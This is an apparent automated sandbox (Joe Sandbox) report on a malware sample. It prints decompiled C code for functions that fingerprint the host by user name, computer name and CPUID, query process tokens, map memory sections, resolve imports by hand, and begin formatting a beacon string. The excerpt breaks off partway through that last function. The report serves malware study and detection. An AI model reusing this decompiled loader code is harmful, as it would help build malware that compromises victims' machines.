          • GetLastError.KERNEL32(?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E169F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
          • String ID: @MqtNqt
          • API String ID: 3401600162-2883916605
          • Opcode ID: d5e1588aa9a428f57aa2d01206aeb3113b37128e324891d8cbc8dd40e3439b70
          • Instruction ID: 4c9a0059ac137ba5cbb50ed77f6a2663d7b00097f0d60826d96f518865afa14d
          • Opcode Fuzzy Hash: d5e1588aa9a428f57aa2d01206aeb3113b37128e324891d8cbc8dd40e3439b70
          • Instruction Fuzzy Hash: 94518AB1900288EFDB14DFA5CC88AAE7FB9FB54340F148429F995E6150D7309E14DB25
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E3BD3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 235 5e3bd3-5e3be7 236 5e3be9-5e3bee 235->236 237 5e3bf1-5e3c03 call 5e71cd 235->237 236->237 240 5e3c57-5e3c64 237->240 241 5e3c05-5e3c15 GetUserNameW 237->241 242 5e3c66-5e3c7d GetComputerNameW 240->242 241->242 243 5e3c17-5e3c27 RtlAllocateHeap 241->243 245 5e3c7f-5e3c90 RtlAllocateHeap 242->245 246 5e3cbb-5e3cdf 242->246 243->242 244 5e3c29-5e3c36 GetUserNameW 243->244 247 5e3c38-5e3c44 call 5e56b9 244->247 248 5e3c46-5e3c55 244->248 245->246 249 5e3c92-5e3c9b GetComputerNameW 245->249 247->248 248->242 251 5e3cac-5e3caf 249->251 252 5e3c9d-5e3ca9 call 5e56b9 249->252 251->246 252->251
          C-Code - Quality: 96%
          			E005E3BD3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x5ea310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E005E71CD( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x5ea344 ^ 0x6c7261ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x5ea2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E005E56B9(_v8 + _v8, _t64);
							}
							HeapFree( *0x5ea2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x5ea2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E005E56B9(_v8 + _v8, _t64);
						}
						HeapFree( *0x5ea2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















          0x005e3bd3
          0x005e3bdb
          0x005e3bdf
          0x005e3be2
          0x005e3be7
          0x005e3be9
          0x005e3bee
          0x005e3bee
          0x005e3bf4
          0x005e3bf6
          0x005e3c03
          0x005e3c64
          0x005e3c05
          0x005e3c0a
          0x005e3c10
          0x005e3c15
          0x005e3c23
          0x005e3c27
          0x005e3c36
          0x005e3c3d
          0x005e3c44
          0x005e3c44
          0x005e3c4f
          0x005e3c4f
          0x005e3c27
          0x005e3c15
          0x005e3c66
          0x005e3c6c
          0x005e3c76
          0x005e3c78
          0x005e3c7d
          0x005e3c8c
          0x005e3c90
          0x005e3c9b
          0x005e3ca2
          0x005e3ca9
          0x005e3ca9
          0x005e3cb5
          0x005e3cb5
          0x005e3c90
          0x005e3cc0
          0x005e3cc2
          0x005e3cc5
          0x005e3cc7
          0x005e3cca
          0x005e3ccd
          0x005e3cd7
          0x005e3cdb
          0x005e3cdf

          APIs
          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E3C0A
          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E3C21
          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E3C2E
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3C4F
          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E3C76
          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005E3C8A
          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E3C97
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3CB5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: HeapName$AllocateComputerFreeUser
          • String ID: Uqt
          • API String ID: 3239747167-2320327147
          • Opcode ID: 32daf39d380c944519404cd5d82e601da6c02cc9db7371ea39674fcc0ac48eb3
          • Instruction ID: 8bbb1be28bf8eec6837e6af5b5f3599547659bbcd95f6829a4b52cf194cdf30e
          • Opcode Fuzzy Hash: 32daf39d380c944519404cd5d82e601da6c02cc9db7371ea39674fcc0ac48eb3
          • Instruction Fuzzy Hash: 8A311CB1A00245AFD718DF79CDC5A6ABBF9FF58300F614429E585E7210E730EE04AB10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E421F Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 38%
          			E005E421F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E005E33DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E005E61DA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















          0x005e422c
          0x005e422d
          0x005e422e
          0x005e422f
          0x005e4230
          0x005e4234
          0x005e423b
          0x005e424a
          0x005e424d
          0x005e4250
          0x005e4257
          0x005e425a
          0x005e425d
          0x005e4260
          0x005e4263
          0x005e426e
          0x005e4270
          0x005e4279
          0x005e4281
          0x005e4283
          0x005e4295
          0x005e429f
          0x005e42a3
          0x005e42b2
          0x005e42b6
          0x005e42bf
          0x005e42c7
          0x005e42c7
          0x005e42c9
          0x005e42c9
          0x005e42d1
          0x005e42d7
          0x005e42db
          0x005e42db
          0x005e42e6

          APIs
          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 005E4266
          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 005E4279
          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E4295
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E42B2
          • memcpy.NTDLL(?,00000000,0000001C), ref: 005E42BF
          • NtClose.NTDLL(?), ref: 005E42D1
          • NtClose.NTDLL(00000000), ref: 005E42DB
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
          • String ID:
          • API String ID: 2575439697-0
          • Opcode ID: 95bba7bbefef5ea394fbef7bd7bd18cf72152cdb18b47254b5ff2c783543ca35
          • Instruction ID: 4bbccb9f228fc3da50a717bf8e2eb3f962432b39bd2e79b701f74f4b507ac372
          • Opcode Fuzzy Hash: 95bba7bbefef5ea394fbef7bd7bd18cf72152cdb18b47254b5ff2c783543ca35
          • Instruction Fuzzy Hash: B12157B1900129BBDB019F95CC89ADEBFBCFB48750F104022FA40E6120D7718B44DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81filetimeCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 369 4015b0-401607 GetSystemTimeAsFileTime 372 401609 369->372 373 40160e-401627 CreateFileMappingW 369->373 372->373 374 401671-401677 GetLastError 373->374 375 401629-401632 373->375 376 401679-40167f 374->376 377 401642-401650 MapViewOfFile 375->377 378 401634-40163b GetLastError 375->378 379 401660-401666 GetLastError 377->379 380 401652-40165e 377->380 378->377 381 40163d-401640 378->381 379->376 382 401668-40166f CloseHandle 379->382 380->376 381->382 382->376
          C-Code - Quality: 69%
          			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402026();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x4051ca);
				_push(_t15 + 0x4051c0);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402020();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














          0x004015b0
          0x004015b9
          0x004015bd
          0x004015c3
          0x004015c8
          0x004015cd
          0x004015d0
          0x004015d3
          0x004015d8
          0x004015d9
          0x004015dc
          0x004015e7
          0x004015ee
          0x004015f2
          0x004015f4
          0x004015f5
          0x004015f8
          0x004015fd
          0x00401607
          0x00401609
          0x00401609
          0x0040161d
          0x00401623
          0x00401627
          0x00401677
          0x00401629
          0x00401632
          0x00401648
          0x00401650
          0x00401662
          0x00401666
          0x00000000
          0x00000000
          0x00401652
          0x00401655
          0x0040165a
          0x0040165c
          0x0040165c
          0x0040163d
          0x0040163f
          0x00401668
          0x00401669
          0x00401669
          0x00401632
          0x0040167f

          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
          • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
          • String ID:
          • API String ID: 3812556954-0
          • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
          • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
          Download Yara Rule
          C-Code - Quality: 72%
          			E0040110B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401459(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















          0x00401114
          0x0040111b
          0x0040111c
          0x0040111d
          0x0040111e
          0x0040111f
          0x00401130
          0x00401134
          0x00401148
          0x0040114b
          0x0040114e
          0x00401155
          0x00401158
          0x0040115f
          0x00401162
          0x00401165
          0x00401168
          0x0040116d
          0x004011a8
          0x0040116f
          0x00401172
          0x00401178
          0x0040117d
          0x00401181
          0x0040119f
          0x00401183
          0x0040118a
          0x00401198
          0x00401198
          0x00401181
          0x004011b0

          APIs
          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
            • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
          • memset.NTDLL ref: 0040118A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Section$CreateViewmemset
          • String ID: @
          • API String ID: 2533685722-2766056989
          • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
          • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
          • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
          • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x43175ac3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x43175a44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x43175ac3;
										}
										 *_v16 = _t55;
										_t58 = _t59 * 4 - 0xc5d6b08;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0xbce8a5bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























          0x00401000
          0x00401009
          0x0040100e
          0x00401014
          0x0040101d
          0x00401023
          0x00401025
          0x00401028
          0x0040102d
          0x00401034
          0x00401034
          0x00401038
          0x0040103e
          0x00401043
          0x00000000
          0x00000000
          0x00401049
          0x00401053
          0x00401055
          0x00401058
          0x0040105b
          0x0040105f
          0x00401067
          0x00401069
          0x0040106c
          0x004010d4
          0x004010d4
          0x004010d8
          0x00000000
          0x00000000
          0x00401071
          0x00401077
          0x00401079
          0x0040108c
          0x0040108f
          0x0040108f
          0x0040108f
          0x00401093
          0x0040107b
          0x0040107b
          0x00401083
          0x00401085
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00401085
          0x00401073
          0x00401073
          0x00401087
          0x00401087
          0x00401087
          0x00401096
          0x00401099
          0x0040109b
          0x004010a2
          0x0040109d
          0x0040109d
          0x0040109d
          0x004010aa
          0x004010b0
          0x004010b2
          0x004010e2
          0x004010b4
          0x004010b4
          0x004010b7
          0x004010b9
          0x004010c1
          0x004010c1
          0x004010c6
          0x004010c8
          0x004010cf
          0x004010d1
          0x004010d1
          0x004010d1
          0x00000000
          0x004010d1
          0x00000000
          0x004010b2
          0x00401061
          0x00401061
          0x00401065
          0x00000000
          0x00000000
          0x00401065
          0x004010e5
          0x004010e5
          0x004010ec
          0x004010f1
          0x00000000
          0x00000000
          0x004010f7
          0x00401102
          0x00000000
          0x00401102
          0x004010f9
          0x004010f9
          0x004010ff
          0x00000000
          0x004010ff
          0x0040102d
          0x00401103
          0x00401108

          APIs
          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
          • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID:
          • API String ID: 2574300362-0
          • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
          • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
          • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
          • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
          Download Yara Rule
          C-Code - Quality: 68%
          			E00401459(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







          0x0040146b
          0x00401471
          0x0040147f
          0x00401486
          0x0040148b
          0x00401491
          0x00000000
          0x00401492
          0x00000000

          APIs
          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: SectionView
          • String ID:
          • API String ID: 1323581903-0
          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
          • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
          • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E3CE0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222memorystringCOMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 69%
          			E005E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x5ea3e0; // 0x2bc9c20
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x5ea2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x5ea018; // 0xc5e3c68d
					asm("bswap eax");
					_t34 =  *0x5ea014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x5ea010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x5ea00c; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x5ea348; // 0x25dd5a8
					_t3 = _t37 + 0x5eb5ac; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x5ea02c,  *0x5ea004, _t112);
					_t40 = E005E467F();
					_t41 =  *0x5ea348; // 0x25dd5a8
					_t4 = _t41 + 0x5eb575; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x5ea348; // 0x25dd5a8
						_t8 = _t93 + 0x5eb508; // 0x732526
